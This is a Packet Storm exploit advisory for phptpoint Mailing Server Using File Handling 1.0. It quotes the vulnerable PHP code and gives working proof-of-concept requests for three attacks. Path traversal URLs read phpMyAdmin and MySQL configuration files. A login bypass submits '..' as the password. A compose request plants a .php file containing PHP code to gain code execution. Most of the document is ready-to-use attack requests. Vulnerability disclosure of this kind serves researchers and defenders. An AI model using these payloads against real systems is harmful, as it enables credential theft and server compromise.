PHPTPoint Mailing Server Using File Handling 1.0 Arbitrary File Read

2018-10-26T00:00:00
ID PACKETSTORM:149965
Type packetstorm
Reporter Boumediene Kaddour
Modified 2018-10-26T00:00:00

Description

                                        
                                            `# Exploit Title: phptpoint Mailing Server Using File Handling 1.0 -  
Arbitrary File Read  
# Date: 2018-10-25  
# Exploit Author: Boumediene KADDOUR  
# Unit: Algerie Telecom R&D Unit  
# Vendor Homepage: https://www.phptpoint.com/  
# Software Link: https://www.phptpoint.com/projects/ignou-mca-projects/  
# Version: 1.0  
# Tested on: WAMP windows 10 x64  
# CVE: unknown  
  
# Description :  
# phptpoint Mailing Server Using File Handling 1.0 suffers from multiple  
Arbitrary File Read vulnerabilities in different sections that allow an  
attacker to read sensitive files on the system, and so bypassing the login  
page.  
  
# Vulnerable Code:home.php  
  
125 //for inbox  
126 $coninb=$_GET['coninb'];  
127 if(isset($coninb))  
128 {  
129 $fo=fopen("User_Data/$user/inbox/$coninb","r");  
130 $filesize=filesize("User_Data/$user/inbox/$coninb");  
131 $msg=fread($fo,$filesize);  
132 echo $msg;  
133 }  
  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?coninb=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?coninb=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
  
134 //for sent  
135 $consent=$_GET['consent'];  
136 if(isset($consent))  
137 {  
138 $fo=fopen("User_Data/$user/sent/$consent","r");  
139 $filesize=filesize("User_Data/$user/sent/$consent");  
140 $msg=fread($fo,$filesize);  
141 echo $msg;  
142 }  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?consent=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?consent=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
143 //for trash  
144 $contrsh=$_GET['contrs'];  
145 if(isset($contrsh))  
146 {  
147 $fo=fopen("User_Data/$user/trash/$contrsh","r");  
148 $filesize=filesize("User_Data/$user/trash/$contrsh");  
149 $msg=fread($fo,$filesize);  
150 echo $msg;  
151 }  
  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?contrs=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?contrh=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
152 //for trash  
153 $condrft=$_GET['condrft'];  
154 if(isset($condrft))  
155 {  
156 $fo=fopen("User_Data/$user/draft/$condrft","r");  
157 $filesize=filesize("User_Data/$user/draft/$condrft");  
158 $msg=fread($fo,$filesize);  
159 echo $msg;  
160 }  
  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?condrft=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?condrft=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
161 //for spam  
162 $conspam=$_GET['conspam'];  
163 if(isset($conspam))  
164 {  
165 $fo=fopen("User_Data/$user/draft/$conspam","r");  
166 $filesize=filesize("User_Data/$user/draft/$conspam");  
167 $msg=fread($fo,$filesize);  
168 echo $msg;  
169 }  
# PoC:  
view-source:  
http://127.0.0.1/Mailserver_filesystem/home.php?conspam=../../../../../../wamp64/apps/phpmyadmin4.8.3/config.inc.php  
http://127.0.0.1/Mailserver_filesystem/home.php?conspam=../../../../../../wamp64/bin/mysql/mysql5.7.23/my.ini  
  
  
  
# Bypass Login page.  
Sicne . and .. are considered as directories in Operations Systems, we can  
pass any valid username and a valid directory or file on the system, which  
will be considered as a valid password.  
Vulnerable Code: login.php  
  
6 if(isset($_POST['l']))  
7 {  
8 $email=$_POST['e'];  
9 $pass=$_POST['p'];  
10 if(file_exists("User_Data/$email") &&  
file_exists("User_Data/$email/$pass"))  
11 {  
12 $_SESSION['user']=$email;  
13 //header('location:home.php');  
14 echo "<script>window.location='home.php'</script>";  
15 }  
16 else  
17 {  
18 echo "<h1 align='center'><font color='green' face='cursive'>Invalid  
User</font></h1>";  
19 }  
  
  
# PoC:  
  
POST /Mailserver_filesystem/index.php?option=login HTTP/1.1  
Host: 172.16.122.4  
Content-Length: 328  
Cache-Control: max-age=0  
Origin: http://172.16.122.4  
Upgrade-Insecure-Requests: 1  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryj3oDIRYA36Vt2dpb  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Referer: http://172.16.122.4/Mailserver_filesystem/index.php?option=login  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7  
Cookie: resolve_ids=0; order_dir_list_by=1A;  
PHPSESSIDwebERPteam=aaktuhmrlihn8c8v5pvscj62j5;  
PHPSESSID=usnk2tfmjjp74ffpuqbfh9hvn1  
Connection: close  
  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb  
Content-Disposition: form-data; name="e"  
  
hacker@ps.com  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb  
Content-Disposition: form-data; name="p"  
  
..  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb  
Content-Disposition: form-data; name="l"  
  
Login  
------WebKitFormBoundaryj3oDIRYA36Vt2dpb--  
  
  
# Arbitrary File upload to code execution  
  
  
http://172.16.122.4/Mailserver_filesystem/User_Data/hacker@ps.com/inbox/abc@ps.com%20.php  
  
POST /Mailserver_filesystem/home.php?option=compose HTTP/1.1  
Host: 172.16.122.4  
Content-Length: 75  
Cache-Control: max-age=0  
Origin: http://172.16.122.4  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Referer: http://172.16.122.4/Mailserver_filesystem/home.php?option=compose  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7  
Cookie: resolve_ids=0; order_dir_list_by=1A;  
PHPSESSIDwebERPteam=aaktuhmrlihn8c8v5pvscj62j5;  
PHPSESSID=usnk2tfmjjp74ffpuqbfh9hvn1  
Connection: close  
  
to=hacker@ps.com&sub=.php&msg=<?php phpinfo(); ?>&send=Send  
  
  
# You can access the php file via this link.  
  
http://yourIP/Mailserver_filesystem/User_Data/hacker@ps.com/inbox/hacker@ps.com.php  
`